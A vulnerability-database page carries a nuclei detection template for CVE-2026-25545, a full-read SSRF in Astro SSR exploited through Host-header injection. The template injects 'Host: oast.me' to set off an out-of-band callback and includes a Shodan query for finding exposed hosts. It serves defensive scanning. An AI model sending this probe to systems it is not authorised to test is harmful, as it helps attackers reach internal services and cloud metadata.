Lucene search
+L

Astro SSR - Server-Side Request Forgery

🗓️ 16 Aug 2026 19:27:40Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Astro SSR vulnerability in Host header handling enables full-read SSRF to internal resources.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-25545
24 Feb 202600:37
attackerkb
circl
Circl
CVE-2026-25545
23 Feb 202613:07
circl
cnnvd
CNNVD
Astro 代码问题漏洞
24 Feb 202600:00
cnnvd
cve
CVE
CVE-2026-25545
24 Feb 202600:37
cve
cvelist
Cvelist
CVE-2026-25545 Astro has Full-Read SSRF in error rendering via Host: header injection
24 Feb 202600:37
cvelist
euvd
EUVD
EUVD-2026-7455
24 Feb 202600:37
euvd
github
Github Security Blog
Astro has Full-Read SSRF in error rendering via Host: header injection
23 Feb 202621:54
github
nvd
NVD
CVE-2026-25545
24 Feb 202601:16
nvd
osv
OSV
GHSA-QQ67-MVV5-FW3G Astro has Full-Read SSRF in error rendering via Host: header injection
23 Feb 202621:54
osv
ptsecurity
Positive Technologies
PT-2026-21546
23 Feb 202600:00
ptsecurity
Rows per page
id: CVE-2026-25545

info:
  name: Astro SSR - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    Astro before 5.17.3 and @astrojs/node before 9.5.4 are vulnerable to full-read SSRF due to improper Host header validation in error page rendering, allowing attackers to redirect requests and access internal resources.
  impact: |
    Full-read SSRF allowing access to internal services, cloud metadata endpoints (AWS/GCP/Azure IMDS), environment files, and any host reachable from the server.
  remediation: |
    Upgrade to astro >= 5.17.3 or @astrojs/node >= 9.5.4. The fix reads prerendered error files directly from disk and validates the Host: header the same way X-Forwarded-Host was already validated.
  reference:
    - https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g
    - https://github.com/withastro/astro/pull/15473
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25545
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-25545
    epss-score: 0.01769
    epss-percentile: 0.76194
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    vendor: astro
    product: astro
    shodan-query: http.component:"Astro"
  tags: cve,cve2026,astro,ssrf

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{randstr}}"
    headers:
      Host: "oast.me"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<html><head></head><body></body></html>")'
          - 'contains(header, "X-Interactsh-Version")'
          - 'status_code == 404'
        condition: and
# digest: 490a00463044022074374d88af7eda1835753206815c8b6bc38d5b1b7d8ca403bba14b1b350ec3580220013b709c3fe61be62a06fa03b89eb459649fdb4ca0d83d22101beaa0820c79db:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 May 2026 12:41Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.18.6
CVSS 46.9
EPSS0.01769
SSVC
24